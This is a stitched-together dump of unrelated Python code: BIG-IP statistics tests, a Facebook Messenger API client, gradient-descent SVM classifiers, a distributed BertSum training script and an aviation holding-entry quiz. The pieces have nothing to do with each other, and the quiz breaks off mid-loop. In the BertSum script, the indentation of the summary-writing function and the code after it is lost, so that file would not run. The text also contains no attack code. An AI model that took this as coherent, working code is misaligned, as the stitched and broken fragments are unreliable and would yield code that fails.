    # NOTE: print statements were converted to the function form so this
    # module parses under Python 3 as well; with a single string argument
    # the output is identical under Python 2.

    @pytest.fixture(scope="session")
    def bigip(self):
        # Management connection to the BIG-IP under test.
        return ManagementRoot(symbol_data.bigip_ip, 'admin', 'admin')

    @pytest.fixture(scope="session")
    def network_helper(self):
        return network_helper.NetworkHelper()

    @pytest.fixture(scope="session")
    def stats_helper(self):
        return stat_helper.StatHelper()

    @pytest.fixture(scope="session")
    def system_helper(self):
        return system_helper.SystemHelper()

    def test_get_global_statistics(self, bigip, stats_helper):
        stats = stats_helper.get_global_statistics(bigip)
        assert stats

    def test_get_composite_score(self, bigip, stats_helper):
        score = stats_helper.get_composite_score(bigip)
        assert score > 0
        print("Composite Score: " + str(score))

    def test_get_mem_health_score(self, bigip, stats_helper):
        score = stats_helper.get_mem_health_score(bigip)
        assert score > 0
        print("Memory Health Score: " + str(score))

    def test_get_cpu_health_score(self, bigip, stats_helper):
        score = stats_helper.get_cpu_health_score(bigip)
        assert score > 0
        print("CPU Health Score: " + str(score))

    def test_get_active_connection_count(self, bigip, stats_helper):
        score = stats_helper.get_active_connection_count(bigip)
        assert score >= 0
        print("Active Connection Count: " + str(score))

    def test_get_active_SSL_TPS(self, bigip, stats_helper):
        score = stats_helper.get_active_SSL_TPS(bigip)
        assert score >= 0
        print("Active SSL TPS: " + str(score))

    def test_get_inbound_throughput(self, bigip, stats_helper):
        score = stats_helper.get_inbound_throughput(bigip)
        assert score > 0
        print("Inbound Throughtput: " + str(score))

    def test_get_outbound_throughput(self, bigip, stats_helper):
        score = stats_helper.get_outbound_throughput(bigip)
        assert score > 0
        print("Outbound Throughtput: " + str(score))

    def test_get_throughput(self, bigip, stats_helper):
        score = stats_helper.get_throughput(bigip)
        assert score >= 0
        print("Throughput: " + str(score))

    def test_get_node_count(self, bigip):
        count = len(bigip.tm.ltm.nodes.get_collection())
        assert count == 1
        print("Node Count: " + str(count))

    def test_get_clientssl_profile_count(self, bigip):
        count = ssl_profile.SSLProfileHelper.get_client_ssl_profile_count(bigip)
        assert count > 0
        print("SSL Profile Count: " + str(count))

    def test_get_tenant_count(self, bigip, system_helper):
        count = system_helper.get_tenant_folder_count(bigip)
        assert count == 1
        print("Tenant Count: " + str(count))

    def test_get_tunnel_count(self, bigip, network_helper):
        count = network_helper.get_tunnel_count(bigip)
        assert count == 1
        print("Tunnel Count: " + str(count))

    def test_get_vlan_count(self, bigip, network_helper):
        count = network_helper.get_vlan_count(bigip)
        assert count == 2
        print("VLAN Count: " + str(count))

    def test_get_route_domain_count(self, bigip, network_helper):
        count = network_helper.get_route_domain_count(bigip)
        assert count == 1
        print("Route Domain Count: " + str(count))
|
import asyncio
import warnings
import re
import aiohttp
from .handler import FacebookHandler
from .types.send_api import Payload, Recipient, Message, Attachment, PersistentMenu
from .types.templates import Template
class MessengerWarning(UserWarning):
    """Warning emitted when a Graph API call returns an error response."""
class Messenger(object):
    """Facebook Messenger Send API client built on aiohttp.

    Wraps the Graph API endpoints used by a Messenger bot: sending text
    messages and templates, sender actions (typing indicators, mark-seen)
    and simple user/page profile lookups.
    """

    def __init__(self, page_access_token, verify_token, urlpath="", **kwargs):
        """
        :param page_access_token: Facebook page access token.
        :param verify_token: webhook verification token.
        :param urlpath: URL path the webhook handler is mounted on.
        :param kwargs: extra options forwarded to FacebookHandler; 'api_ver'
            (default 'v3.3') selects the Graph API version.
        """
        # NOTE(review): 'api_ver' is popped *after* kwargs has already been
        # handed to FacebookHandler, so the handler also receives it —
        # confirm this ordering is intended.
        self.handler = FacebookHandler(page_access_token, verify_token, **kwargs)
        self.page_access_token = page_access_token
        self.urlpath = urlpath
        self.api_ver = kwargs.pop('api_ver', 'v3.3')

    def _get_url(self, suffix):
        """Build the full Graph API URL for the configured API version."""
        return f"https://graph.facebook.com/{self.api_ver}/{suffix}"

    @staticmethod
    async def _api_call_post(url, data):
        """POST a JSON payload to *url*; warn (not raise) on API errors.

        :param url: full Graph API URL (access token in the query string).
        :param data: JSON-encoded request body.
        :return: decoded JSON response dict.
        """
        async with aiohttp.ClientSession() as session:
            headers = {'Content-type': 'application/json'}
            async with session.post(url=url,
                                    data=data,
                                    headers=headers) as response:
                response = await response.json()
                if response.get('error'):
                    # The access token is stripped from the logged URL.
                    warnings.warn(f"POST request to "
                                  f"\"{re.sub('[?]access_token=[A-Za-z0-9]+', '', url)}\""
                                  f" returns error: {response['error']}",
                                  MessengerWarning)
                return response

    @staticmethod
    async def _api_call_get(url, params):
        """GET *url* with query *params*; warn (not raise) on API errors.

        :param url: full Graph API URL.
        :param params: dict of query-string parameters (incl. access token).
        :return: decoded JSON response dict.
        """
        async with aiohttp.ClientSession() as session:
            headers = {'Content-type': 'application/json'}
            async with session.get(url=url,
                                   params=params,
                                   headers=headers) as response:
                response = await response.json()
                if response.get('error'):
                    warnings.warn(f"GET request to "
                                  f"\"{re.sub('[?]access_token=[A-Za-z0-9]+', '', url)}\""
                                  f" returns error: {response['error']}",
                                  MessengerWarning)
                return response

    async def get_user_profile(self, psid, fields=("first_name", "last_name")):
        """Fetch profile fields for a user.

        :param psid: page-scoped user id.
        :param fields: iterable of profile field names to request.
        :return: decoded JSON response dict.
        """
        params = {"fields": f"{','.join(fields)}", "access_token": self.page_access_token}
        response = await self._api_call_get(self._get_url(f"{psid}"), params)
        return response

    async def get_page_info(self):
        """Fetch information about the page the access token belongs to.

        :return: decoded JSON response dict.
        """
        params = {"access_token": self.page_access_token}
        response = await self._api_call_get(self._get_url(f"me"), params)
        return response

    async def send(self, recipient_id, message, quick_replies=None,
                   messaging_type=None, metadata=None, notification_type=None,
                   tag=None):
        """Send a text message or a template to a user.

        :param recipient_id: page-scoped id of the recipient.
        :param message: str (text message) or Template instance.
        :param quick_replies: optional quick replies attached to the message.
        :param messaging_type: optional Send API messaging type.
        :param metadata: optional metadata echoed back via webhook.
        :param notification_type: optional notification type.
        :param tag: optional message tag.
        :raises ValueError: if *message* is neither str nor Template.
        """
        if not isinstance(message, str) and not isinstance(message, Template):
            raise ValueError(f"Message must be str or Template, got {type(message)}")
        text = message if isinstance(message, str) else None
        attachment = Attachment("template", message) if not text else None
        data = Payload(recipient=Recipient(id_=recipient_id),
                       message=Message(text=text,
                                       attachment=attachment,
                                       quick_replies=quick_replies,
                                       metadata=metadata),
                       messaging_type=messaging_type,
                       notification_type=notification_type,
                       tag=tag).to_json()
        await self._api_call_post(self._get_url(f"me/messages?access_token"
                                                f"={self.page_access_token}"), data)

    async def set_persistent_menu(self, persistent_menu):
        """Set the page's persistent menu (not implemented yet).

        :param persistent_menu: PersistentMenu definition.
        :raises NotImplementedError: always.
        """
        raise NotImplementedError

    async def _send_sender_action(self, recipient_id, sender_action):
        """Send a bare sender action ('typing_on', 'typing_off', 'mark_seen').

        Shared implementation for the three public sender-action helpers,
        which previously duplicated this payload/post sequence verbatim.
        """
        data = Payload(recipient=Recipient(id_=recipient_id),
                       messaging_type=None,
                       message=None,
                       sender_action=sender_action).to_json()
        await self._api_call_post(self._get_url(f"me/messages?access_token"
                                                f"={self.page_access_token}"), data)

    async def typing_on(self, recipient_id):
        """Show the typing indicator to *recipient_id*."""
        await self._send_sender_action(recipient_id, "typing_on")

    async def typing_off(self, recipient_id):
        """Hide the typing indicator for *recipient_id*."""
        await self._send_sender_action(recipient_id, "typing_off")

    async def mark_seen(self, recipient_id):
        """Mark the last message from *recipient_id* as seen."""
        await self._send_sender_action(recipient_id, "mark_seen")

    def imitate_typing(self, time_to_sleep=0):
        """Decorator: wrap a handler with mark-seen + typing indicators.

        :param time_to_sleep: seconds to keep the typing indicator on.
        :return: decorator for an async event handler.
        """
        def decorator(func):
            async def wrapper(event, *args, **kwargs):
                await self.mark_seen(event.sender_id)
                await self.typing_on(event.sender_id)
                await asyncio.sleep(time_to_sleep)
                await func(event, *args, **kwargs)
                await self.typing_off(event.sender_id)
            return wrapper
        return decorator
|
<filename>ad_examples/classifier/svm.py
import numpy.random as rnd
from ..common.utils import *
from ..common.gen_samples import *
from ..common.sgd_optimization import sgdRMSProp
"""
Simple SVM implementations in primal form, solved with only gradient descent
and no other linear optimization libraries.
"""
class Classifier(object):
    """Minimal base class for the primal-form SVM classifiers.

    Holds the regularization constant, the learned weights/bias, and a
    bidirectional mapping between class labels and contiguous indices.
    """

    def __init__(self, C=1.):
        self.C = C            # regularization trade-off constant
        self.w_ = None        # learned weight vector(s), set by fit()
        self.b_ = None        # learned bias term(s), set by fit()
        self.cls2index_ = None
        self.index2cls_ = None
        self.w_names = None   # human-readable names for weight columns

    def set_classes(self, y):
        """Build label <-> index maps from the distinct labels in y."""
        labels = np.unique(y)
        self.cls2index_ = {label: idx for idx, label in enumerate(labels)}
        self.index2cls_ = {idx: label for idx, label in enumerate(labels)}

    def fit(self, x, y):
        pass

    def decision_function(self, x):
        """Signed distance(s) of each row of x from the hyperplane(s)."""
        return x.dot(self.w_) + self.b_

    def predict(self, x):
        pass
class BinaryLinearSVMClassifier(Classifier):
    """A very simple binary SVM classifier trained using gradient descent.

    Note: The optimization solves the objective in primal.
    """

    def __init__(self, C=1.):
        Classifier.__init__(self, C)

    def f(self, Wb, x, y):
        """Regularized hinge loss.

        loss = 0.5 * w.w / C + mean(max(0, 1 - y_pm * (x.w + b)))
        where y_pm maps labels to {+1, -1}.
        """
        w = Wb[0:(len(Wb) - 1)]
        b = Wb[len(Wb) - 1]
        y_pm = np.array([1. if label == 1 else -1. for label in y])
        margins = 1. - y_pm * (x.dot(w) + b)
        reg = 0.5 * w.dot(w) / self.C
        return reg + np.mean(np.maximum(margins, 0.))

    def g(self, Wb, x, y):
        """Subgradient of f with respect to the stacked vector (w, b)."""
        w = Wb[0:(len(Wb) - 1)]
        b = Wb[len(Wb) - 1]
        y_pm = np.array([1 if label == 1 else -1 for label in y])
        # Rows with an active (positive) hinge term contribute to the gradient.
        active = (1. - y_pm * (x.dot(w) + b)) > 0
        pos = np.transpose([np.logical_and(active, y_pm == 1.).astype(int)])
        neg = np.transpose([np.logical_and(active, y_pm == -1.).astype(int)])
        grad_w = np.mean(np.multiply(pos, -x) + np.multiply(neg, x), axis=0)
        grad_b = np.mean(np.multiply(pos, -1) + np.multiply(neg, 1.))
        return np.append(w / self.C, [0.]) + np.append(grad_w, grad_b)

    def fit(self, x, y):
        """Train with RMSProp-flavored SGD; returns (w_, b_)."""
        self.w_ = None
        self.b_ = None
        self.set_classes(y)
        y_idx = np.array([self.cls2index_[label] for label in y])
        # Start from zero weights and zero bias, stacked as one vector.
        start = np.append(np.zeros(x.shape[1], dtype=float), [0.])
        solution = sgdRMSProp(start, x, y_idx,
                              lambda wb, xx, yy: self.f(wb, xx, yy),
                              lambda wb, xx, yy: self.g(wb, xx, yy),
                              learning_rate=0.001, max_epochs=15000)
        self.w_ = solution[0:(len(solution) - 1)]
        self.b_ = solution[len(solution) - 1]
        return self.w_, self.b_

    def predict(self, x):
        """Map the sign of the decision function back to class labels."""
        signs = np.sign(self.decision_function(x))
        return np.array([self.index2cls_[0] if s == -1 else self.index2cls_[1]
                         for s in signs])
class MultiClassLinearSVMClassifier(Classifier):
    """A very simple multi-class SVM classifier trained using gradient descent.

    We solve the classification problem simultaneously for all classes instead
    of treating the task as multiple independent binary classification tasks.
    Define m as the predicted class for x:
        m = argmax_{k=1..M} x.w_k + b_k
    The objective is:
        minimize_w 0.5 * w.w + C * hinge_loss(2 + x.w_m + b_m - x.w_y - b_y)
    Note: The optimization solves the objective in primal.
    """

    def __init__(self, C=1., penalty_type='L1', penalize_bias=False):
        Classifier.__init__(self, C)
        if not (penalty_type == 'L1' or penalty_type == 'L2'):
            raise ValueError("Invalid penalty type.")
        self.penalty_type = penalty_type  # 'L1'/'L2'
        self.penalize_bias = penalize_bias

    def f(self, Wb, x, y):
        """Loss function
        hinge_loss(x) = max(0, x)
        Define m as the predicted class for x:
            m = argmax_{k=1..M} x.w_k + b_k
        loss = 0.5 * w.w / C
               + hinge_loss(2 + x.w_m + b_m - x.w_y - b_y)^p
        where p = 1 or 2 depending on penalty_type
        Args:
            Wb: np.array(size=(M x (d+1),))
                Where M is the number of classes, d is the data dimension,
                includes one bias for each class. The weight vectors for all
                classes are concatenated one after the other to form a 1d array.
        """
        n = x.shape[0]
        d = x.shape[1]
        # BUG FIX: integer (floor) division; '/' yields a float under
        # Python 3 and np.reshape requires an integer shape.
        M = len(Wb) // (d+1)  # The d plus one for bias term
        Wb_ = np.reshape(Wb, (M, d+1), order='C')
        # logger.debug("Wb_:\n%s" % str(Wb_))
        wT = Wb_[:, 0:d]
        b = Wb_[:, d]
        w = np.transpose(wT)  # weights are column vectors
        pv = x.dot(w) + b
        py = np.argmax(pv, axis=1)
        loss_h = 0.0
        errors = 0.
        for i, yy in enumerate(py):
            if y[i] != yy:
                # true y does not match predicted y
                loss_x = np.maximum(0, 2. + x[i].dot(wT[yy] - wT[y[i]]) + b[yy] - b[y[i]])
                if self.penalty_type == 'L2':
                    loss_x = loss_x ** 2
                loss_h += loss_x
                errors += 1
        if self.penalty_type == 'L2':
            loss_h *= 0.5
        loss_h = (1. / n) * loss_h
        loss_r = 0.5 * np.trace(np.transpose(w).dot(w)) / self.C
        if self.penalize_bias:
            loss_r += 0.5 * b.dot(b) / self.C
        return loss_r + loss_h

    def g(self, Wb, x, y):
        """Gradient of loss function
        Define m as the predicted class for x:
            m = argmax_{k=1..M} x.w_k + b_k
        and define margin loss v as:
            v = max(0, 2 + x.w_m + b_m - x.w_y - b_y)^p
        where p = 1 or 2 depending on penalty_type
        for p = 1, gradient of loss is:
            d_loss_k = w_k / C
                       + 1[k == m] * 1[m != y] * 1[v > 0] * ( 1) * x
                       + 1[k == y] * 1[m != y] * 1[v > 0] * (-1) * x
        Args:
            Wb: np.array(size=(M x (d+1),))
                Where M is the number of classes, d is the data dimension,
                includes one bias for each class. The weight vectors for all
                classes are concatenated one after the other to form a 1d array.
        """
        n = x.shape[0]
        d = x.shape[1]
        # BUG FIX: integer (floor) division, same as in f().
        M = len(Wb) // (d+1)  # The d plus one for bias term
        Wb_ = np.reshape(Wb, (M, d+1), order='C')
        wT = Wb_[:, 0:d]
        b = Wb_[:, d]
        w = np.transpose(wT)  # weights are column vectors
        pv = x.dot(w) + b
        py = np.argmax(pv, axis=1)  # predicted y
        # get all incorrect predictions
        dlossW = np.zeros(shape=w.shape, dtype=w.dtype)
        dlossb = np.zeros(len(b), dtype=b.dtype)
        for i, m in enumerate(py):
            yi = y[i]
            if yi != m:  # true != predicted
                vx = x[i].dot(wT[m] - wT[yi])
                v = np.maximum(0, 2. + vx + b[m] - b[yi])
                if v > 0:
                    if self.penalty_type == 'L2':
                        dlossW[:, m] += v * x[i]
                        dlossW[:, yi] -= v * x[i]
                        dlossb[ m] += v
                        dlossb[yi] -= v
                    else:
                        dlossW[:, m] += x[i]
                        dlossW[:, yi] -= x[i]
                        dlossb[ m] += 1
                        dlossb[yi] -= 1
        dlossW = w / self.C + (1. / n) * dlossW
        dlossb = (1. / n) * dlossb
        if self.penalize_bias:
            dlossb += b / self.C
        dlossWb = np.transpose(np.vstack([dlossW, dlossb]))
        return np.ravel(dlossWb, order='C')

    def fit(self, x, y):
        """Train with RMSProp-flavored SGD; returns (w_, b_).

        w_ has shape (d, M) (one column per class); b_ has shape (M,).
        """
        def wf(w, x, y):
            return self.f(w, x, y)

        def wg(w, x, y):
            return self.g(w, x, y)

        self.w_ = None
        self.b_ = None
        self.set_classes(y)
        y_ = np.array([self.cls2index_[v] for v in y])
        d = x.shape[1]
        M = len(self.cls2index_)
        Wb0 = np.reshape(rnd.uniform(-1., 1., (d+1)*M), (d+1, M))
        Wb0[d, :] = 0.  # bias is initialized to zero
        Wb0_ = np.ravel(np.transpose(Wb0), order='C')
        Wb_ = sgdRMSProp(Wb0_, x, y_, wf, wg, learning_rate=0.001, max_epochs=15000)
        Wb = np.transpose(np.reshape(Wb_, (M, d+1), order='C'))
        self.w_ = Wb[0:d]
        self.b_ = Wb[d]
        self.w_names = []
        for i in self.index2cls_.keys():
            self.w_names.append("class %s" % str(self.index2cls_[i]))
        return self.w_, self.b_

    def predict(self, x):
        """Return the class whose decision value is largest for each row."""
        des = self.decision_function(x)
        pred_y = np.argmax(des, axis=1)
        y = np.array([self.index2cls_[k] for k in pred_y])
        return y
class PairwiseLinearSVMClassifier(Classifier):
    """One-vs-one multi-class SVM built from binary linear SVMs."""

    def __init__(self, C):
        Classifier.__init__(self, C)
        self.svms = None  # one BinaryLinearSVMClassifier per class pair

    def fit(self, x, y):
        """Train one binary SVM for every unordered pair of classes."""
        self.set_classes(y)
        n_features = x.shape[1]
        n_classes = len(self.index2cls_)
        n_pairs = int((n_classes * (n_classes - 1)) / 2)
        self.svms = []
        self.w_ = np.zeros(shape=(n_features, n_pairs), dtype=float)
        self.b_ = np.zeros(n_pairs, dtype=float)
        self.w_names = []
        labels = list(self.cls2index_.keys())
        col = 0
        for i in range(len(labels) - 1):
            first = labels[i]
            for j in range(i + 1, len(labels)):
                second = labels[j]
                self.w_names.append("%s vs %s" % (str(first), str(second)))
                # Rows belonging to either of the two classes in the pair.
                subset = np.array([k for k, label in enumerate(y)
                                   if label == first or label == second])
                svm = BinaryLinearSVMClassifier(C=self.C)
                x_pair = x[subset]
                y_pair = y[subset]
                w, b = svm.fit(x_pair, y_pair)
                # Training-set predictions; kept for parity with the
                # original's (commented-out) debug path.
                preds = svm.predict(x_pair)
                errors = np.sum([1. if p[0] != p[1] else 0.
                                 for p in zip(preds, y_pair)])
                self.svms.append(svm)
                self.w_[:, col] = w
                self.b_[col] = b
                col += 1
        return self.w_, self.b_

    def predict(self, x):
        """Majority vote over all pairwise decision functions."""
        n = x.shape[0]
        # 1 where the pairwise decision is positive, else 0 — indexes each
        # binary svm's index2cls_ mapping.
        wins = np.maximum(0, np.sign(self.decision_function(x))).astype(int)
        votes = np.zeros(shape=(n, len(self.cls2index_)), dtype=int)
        for row in range(n):
            for col, svm in enumerate(self.svms):
                predicted = svm.index2cls_[wins[row, col]]
                votes[row, self.cls2index_[predicted]] += 1
        winners = np.argmax(votes, axis=1)
        return np.array([self.index2cls_[k] for k in winners])
|
<reponame>Anita1017/nlp-recipes
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import argparse
import os
import sys
import time
import torch
import torch.distributed as dist
import torch.multiprocessing as mp
# torch.set_printoptions(threshold=5000)
# Make the repo root and the script's own directory importable so that the
# utils_nlp package resolves when this script is run from its folder.
nlp_path = os.path.abspath("../../")
if nlp_path not in sys.path:
    sys.path.insert(0, nlp_path)
sys.path.insert(0, "./")
from utils_nlp.models.transformers.abstractive_summarization_bertsum import (
    BertSumAbs,
    BertSumAbsProcessor,
    validate,
)
from utils_nlp.dataset.cnndm import CNNDMSummarizationDataset

# NCCL environment for multi-GPU training: "0" means InfiniBand is NOT
# disabled; subsystem logging is enabled for all NCCL components.
os.environ["NCCL_IB_DISABLE"] = "0"
# os.environ["NCCL_DEBUG"] = "INFO"
os.environ["NCCL_DEBUG_SUBSYS"] = "ALL"
# os.environ["MASTER_PORT"] = "29952"
# os.environ["MASTER_ADDR"] = "192.168.3.11"
# os.environ['NCCL_SOCKET_IFNAME'] = 'lo'
# Command-line interface for distributed abstractive-summarization training.
# NOTE: argparse applies `type` only to command-line strings, never to the
# `default` value, so defaults declared with `type=int` must themselves be
# ints — the step-count defaults below were floats (5e4/2e4/1e4) and are
# now written as integers.
parser = argparse.ArgumentParser()
parser.add_argument(
    "--rank", type=int, default=0, help="The rank of the current node in the cluster"
)
parser.add_argument(
    "--dist_url",
    type=str,
    default="tcp://127.0.0.1:29507",
    help="URL specifying how to initialize the process groupi.",
)
parser.add_argument(
    "--node_count", type=int, default=1, help="Number of nodes in the cluster."
)
parser.add_argument(
    "--cache_dir",
    type=str,
    default="./abstemp",
    help="Directory to cache the tokenizer.",
)
parser.add_argument(
    "--data_dir",
    type=str,
    default="./abstemp",
    help="Directory to download the preprocessed data.",
)
parser.add_argument(
    "--output_dir",
    type=str,
    default="./abstemp",
    help="Directory to save the output model and prediction results.",
)
parser.add_argument(
    "--quick_run",
    type=str.lower,
    default="false",
    choices=["true", "false"],
    help="Whether to have a quick run",
)
parser.add_argument(
    "--model_name",
    type=str,
    default="bert-base-uncased",
    help='Transformer model used in the summarization model, only \
        "bert-uncased" is supported so far.',
)
parser.add_argument(
    "--lr_bert", type=float, default=2e-3, help="Learning rate for the BERT encoder."
)
parser.add_argument(
    "--lr_dec", type=float, default=2e-1, help="Learning rate for the decoder."
)
parser.add_argument(
    "--batch_size",
    type=int,
    default=5,
    help="batch size in terms of input token numbers in training",
)
parser.add_argument(
    "--max_pos_length",
    type=int,
    default=512,
    help="maximum input length in terms of input token numbers in training",
)
parser.add_argument(
    "--max_steps",
    type=int,
    default=50000,
    help="""Maximum number of training steps run in training.
        If quick_run is set, it's not used.""",
)
parser.add_argument(
    "--warmup_steps_bert",
    type=int,
    default=20000,
    help="Warm-up number of training steps run in training for the encoder. \
        If quick_run is set, it's not used.",
)
parser.add_argument(
    "--warmup_steps_dec",
    type=int,
    default=10000,
    help="Warm-up number of training steps run in training for the decoder. \
        If quick_run is set, it's not used.",
)
parser.add_argument(
    "--summary_filename",
    type=str,
    default="generated_summaries.txt",
    help="Summary file name generated by prediction for evaluation.",
)
parser.add_argument(
    "--model_filename",
    type=str,
    default="dist_abssum_model.pt",
    help="model file name saved for evaluation.",
)
parser.add_argument(
    "--checkpoint_filename",
    type=str,
    default=None,
    help="filename of a checkpoint where the trainging resumes from. \
        default path is at cache_dir",
)
parser.add_argument(
    "--report_every",
    type=int,
    default=10,
    help="number of steps between each loss report",
)
parser.add_argument(
    "--save_every",
    type=int,
    default=500,
    help="number of steps between each model save and validation",
)
parser.add_argument(
    "--fp16",
    type=str.lower,
    default="false",
    choices=["true", "false"],
    help="Whether to use mixed precision training",
)
parser.add_argument(
    "--fp16_opt_level",
    type=str.upper,
    default="O2",
    choices=["O0", "O1", "O2", "O3"],
    help="optimization level, refer to \
         https://nvidia.github.io/apex/amp.html#opt-levels for details ",
)
def main():
    """Parse args, load CNN/DM data, and spawn one training worker per GPU."""
    args = parser.parse_args()
    print("NCCL_IB_DISABLE: {}".format(os.getenv("NCCL_IB_DISABLE")))
    print("quick_run is {}".format(args.quick_run))
    print("output_dir is {}".format(args.output_dir))
    print("data_dir is {}".format(args.data_dir))
    print("cache_dir is {}".format(args.cache_dir))
    # BUG FIX: a quick run should train on a small subset (top 10 examples)
    # and a full run on the entire dataset (-1 = all). The original condition
    # was inverted — it truncated the dataset when quick_run was "false".
    TOP_N = -1
    if args.quick_run.lower() == "true":
        TOP_N = 10
    train_dataset, test_dataset = CNNDMSummarizationDataset(
        top_n=TOP_N, local_cache_path=args.data_dir, prepare_extractive=False
    )
    ngpus_per_node = torch.cuda.device_count()
    processor = BertSumAbsProcessor(
        cache_dir=args.cache_dir, max_src_len=args.max_pos_length
    )
    summarizer = BertSumAbs(
        processor, cache_dir=args.cache_dir, max_pos_length=args.max_pos_length
    )
    # One process per local GPU; each calls main_worker with its spawn index.
    mp.spawn(
        main_worker,
        nprocs=ngpus_per_node,
        args=(ngpus_per_node, summarizer, train_dataset, test_dataset, args),
    )
def main_worker(
    local_rank, ngpus_per_node, summarizer, train_dataset, test_dataset, args
):
    """Per-GPU worker: joins the process group, trains, and (rank 0 only)
    saves the model and runs prediction on the test set.

    Args:
        local_rank: GPU/spawn index on this node.
        ngpus_per_node: number of GPUs per node.
        summarizer: BertSumAbs model shared by all workers.
        train_dataset: training dataset.
        test_dataset: dataset used for validation and final prediction.
        args: parsed command-line arguments.
    """
    rank = args.rank * ngpus_per_node + local_rank
    world_size = args.node_count * ngpus_per_node
    print("world_size is {}".format(world_size))
    print("local_rank is {} and rank is {}".format(local_rank, rank))
    torch.distributed.init_process_group(
        backend="nccl", init_method=args.dist_url, world_size=world_size, rank=rank,
    )
    ## should not load checkpoint from this place, otherwise, huge memory increase
    if args.checkpoint_filename:
        checkpoint = os.path.join(args.cache_dir, args.checkpoint_filename)
    else:
        checkpoint = None

    def this_validate(class_obj):
        # Validation closure bound to the shared test dataset.
        return validate(class_obj, test_dataset)

    # Only rank 0 (or single-process rank -1) saves checkpoints and validates.
    if rank not in [-1, 0]:
        save_every = -1
        this_validate = None
    else:
        save_every = args.save_every
    fp16 = args.fp16.lower() == "true"
    print("fp16 is {}".format(fp16))
    # Small defaults used for a quick run; overridden below for a full run.
    MAX_STEPS = 10
    SAVE_EVERY = 10
    REPORT_EVERY = 10
    # number of steps for warm up
    WARMUP_STEPS_BERT = MAX_STEPS
    WARMUP_STEPS_DEC = MAX_STEPS
    if args.quick_run.lower() == "false":
        MAX_STEPS = args.max_steps
        WARMUP_STEPS_BERT = args.warmup_steps_bert
        WARMUP_STEPS_DEC = args.warmup_steps_dec
        SAVE_EVERY = save_every
        REPORT_EVERY = args.report_every
    print("max steps is {}".format(MAX_STEPS))
    print("warmup steps for encoder bert is {}".format(WARMUP_STEPS_BERT))
    print("warmup steps for decoder is {}".format(WARMUP_STEPS_DEC))
    start = time.time()
    # summarizer.model.load_checkpoint(checkpoint['model'])
    summarizer.fit(
        train_dataset,
        world_size=world_size,
        num_gpus=None,
        local_rank=local_rank,
        rank=rank,
        batch_size=args.batch_size,
        max_steps=MAX_STEPS / world_size,
        learning_rate_bert=args.lr_bert,
        learning_rate_dec=args.lr_dec,
        warmup_steps_bert=WARMUP_STEPS_BERT,
        warmup_steps_dec=WARMUP_STEPS_DEC,
        save_every=SAVE_EVERY,
        report_every=REPORT_EVERY,
        validation_function=this_validate,
        fp16=fp16,
        fp16_opt_level=args.fp16_opt_level,
        checkpoint=checkpoint,
    )
    end = time.time()
    print("rank {0}, duration {1:.6f}s".format(rank, end - start))
    if local_rank in [0, -1] and args.rank == 0:
        # BUG FIX: predict on the full test set (-1) for a full run and only
        # on a small subset for a quick run; the original condition was
        # inverted (matching the MAX_STEPS quick-run pattern above).
        TOP_N = -1
        if args.quick_run.lower() == "true":
            TOP_N = ngpus_per_node
        saved_model_path = os.path.join(
            args.output_dir, "{}_step{}".format(args.model_filename, MAX_STEPS)
        )
        summarizer.save_model(MAX_STEPS, saved_model_path)
        prediction = summarizer.predict(
            test_dataset.shorten(top_n=TOP_N), batch_size=ngpus_per_node, num_gpus=ngpus_per_node
        )
        print(prediction[0])
def _write_list_to_file(list_items, filename):
with open(filename, "w") as filehandle:
# for cnt, line in enumerate(filehandle):
for item in list_items:
filehandle.write("%s\n" % item)
print("writing generated summaries")
_write_list_to_file(
prediction, os.path.join(args.output_dir, args.summary_filename)
)
# only use the following line when you use your own cluster.
# AML distributed training run cleanup for you.
dist.destroy_process_group()
# Launch the distributed training job when executed as a script.
if __name__ == "__main__":
    main()
|
<filename>main.py
import random
from argparse import ArgumentParser
from enum import Enum, auto
class Turns(Enum):
    """Holding-pattern turn direction; values are the CLI spellings."""
    RIGHT = 'right'
    LEFT = 'left'
class Entries(Enum):
    """Standard holding entry procedures.

    The auto() integer values (1..3) double as the quiz answer numbers.
    """
    DIRECT = auto()
    PARALLEL = auto()
    TEARDROP = auto()
def get_reciprocal(degrees):
    """Return the reciprocal heading on a 1-360 degree compass."""
    return degrees - 180 if degrees > 180 else degrees + 180
def get_parallel_limits(holding_radial, turn):
    """Return (direct_radial, direct_reciprocal), the two radials bounding
    the direct-entry sector, offset 70 degrees from the holding radial and
    mirrored for left-hand patterns."""
    if turn == Turns.RIGHT:
        direct_radial = (
            holding_radial + 290 if holding_radial < 71 else holding_radial - 70
        )
        direct_reciprocal = get_reciprocal(direct_radial)
    else:
        direct_reciprocal = (
            holding_radial + 70 if holding_radial < 291 else holding_radial - 290
        )
        direct_radial = get_reciprocal(direct_reciprocal)
    return direct_radial, direct_reciprocal
def is_clockwise_between(radial_a, radial_b, course):
    """Check whether a course falls clockwise between two radials
    Edges are always False"""
    recip = get_reciprocal(course)
    # Sector edges never count as "between".
    if recip == radial_a or recip == radial_b:
        return False
    if radial_a < radial_b:
        return recip in range(radial_a, radial_b + 1)
    if radial_a > radial_b:
        # Sector wraps through 360/001.
        return recip in range(radial_a, 360 + 1) or recip in range(1, radial_b + 1)
    return False
def get_entry(holding_radial, turn, direct_radial, direct_reciprocal, inbound_course):
    """Classify the holding entry for an inbound course.

    Sector edges are handled first (is_clockwise_between excludes edges),
    then each sector maps to an entry type, mirrored for left-hand turns.
    """
    holding_reciprocal = get_reciprocal(holding_radial)
    if inbound_course in (direct_radial, direct_reciprocal):
        return Entries.DIRECT
    if inbound_course == holding_radial:
        return Entries.PARALLEL
    if is_clockwise_between(direct_radial, direct_reciprocal, inbound_course):
        return Entries.DIRECT
    if is_clockwise_between(direct_reciprocal, holding_reciprocal, inbound_course):
        return Entries.TEARDROP if turn == Turns.RIGHT else Entries.PARALLEL
    if is_clockwise_between(holding_reciprocal, direct_radial, inbound_course):
        return Entries.PARALLEL if turn == Turns.RIGHT else Entries.TEARDROP
    raise ValueError(f'Unhandled edge case: {holding_radial}, {turn.value}, {direct_radial}, {direct_reciprocal}, {inbound_course}')
def quiz(args):
    """Interactive quiz: generate random holds and grade the user's entry choice."""
    valid_answers = [e.value for e in Entries]
    for question_number in range(1, args.questions + 1):
        print(80 * '-')
        print(f'Question {question_number}')
        holding_radial = random.randint(1, 360)
        turn = random.choice(list(Turns))
        direct_radial, direct_reciprocal = get_parallel_limits(holding_radial, turn)
        inbound_course = random.randint(1, 360)
        correct_answer = get_entry(holding_radial, turn, direct_radial, direct_reciprocal, inbound_course)
        answer = None
        # Re-prompt until a valid entry number is supplied.
        while answer not in valid_answers:
            print(80 * '-')
